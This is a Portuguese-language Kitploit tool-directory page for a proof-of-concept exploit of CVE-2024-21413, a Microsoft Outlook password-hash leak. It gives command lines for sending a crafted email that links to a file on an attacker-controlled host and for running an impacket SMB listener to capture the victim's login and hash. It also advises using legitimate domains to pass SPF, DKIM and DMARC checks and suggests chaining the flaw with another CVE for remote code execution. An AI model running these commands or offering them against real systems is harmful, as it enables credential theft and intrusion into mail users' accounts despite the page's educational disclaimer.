Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-21413-POC — Vulnerabilidade de Divulgação de Informações do Microsoft Outlook (vazamento de hash de senha) - PoC CVE-2024-21413 | Kitploit
Ferramentas/GitHubGitHub/r00tb1t/cve-2024-21413-poc
Quebra de SenhasAnálise de VulnerabilidadesExploraçãoColeta de InformaçõesAprendizado e EducaçãoSegurança de Email
GitHubr00tb1t/cve-2024-21413-poc

CVE-2024-21413-POC

Vulnerabilidade de Divulgação de Informações do Microsoft Outlook (vazamento de hash de senha) - PoC CVE-2024-21413

Ver Repositório
172há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-21413 - POC

Uso:

python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url xx.xx.xx.xx/path/to/shared/file/r0tb1t.rtf

[!NOTE] r00tb1t : é o arquivo de teste compartilhado (Word neste caso) da máquina do atacante (xx.xx.xx.xx).

Para garantir a conformidade com SPF, DKIM e DMARC, use $IP e domínio legítimos.

Certifique-se de instalar a biblioteca pexpect, caso ainda não o tenha feito, usando pip install pexpect.

Dicas para executar o POC:

  • Execute um listener SMB impacket-smbserver -smb2support -ip 0.0.0.0 test /tmp .
  • Execute o POC

python CVE-2024-21413.py -host example.com -port 25 -from [email protected] -recipient [email protected] -url example.com/path/to/shared/file/r0tb1t.rtf

  • Clique no link no e-mail recebido e BOOM, você deve obter o login e o hash no listener
  • encadeie este CVE com o CVE-2023-21716 para obter RCE !!!
  • Kudooooos e detalhes sobre o CVE-2024-21413 .
  • Solução Alternativa/Correção:

[!CAUTION] ⚠️ Aviso: IMPORTANTE: Este script é fornecido APENAS para fins educacionais, testes éticos e uso legal. Não o utilize em qualquer sistema ou rede sem permissão explícita. O acesso não autorizado a sistemas de computador e redes é ilegal, e usuários flagrados realizando atividades não autorizadas estão sujeitos a ações legais. O autor NÃO é responsável por qualquer dano causado pelo uso indevido deste script..

Baixar ferramenta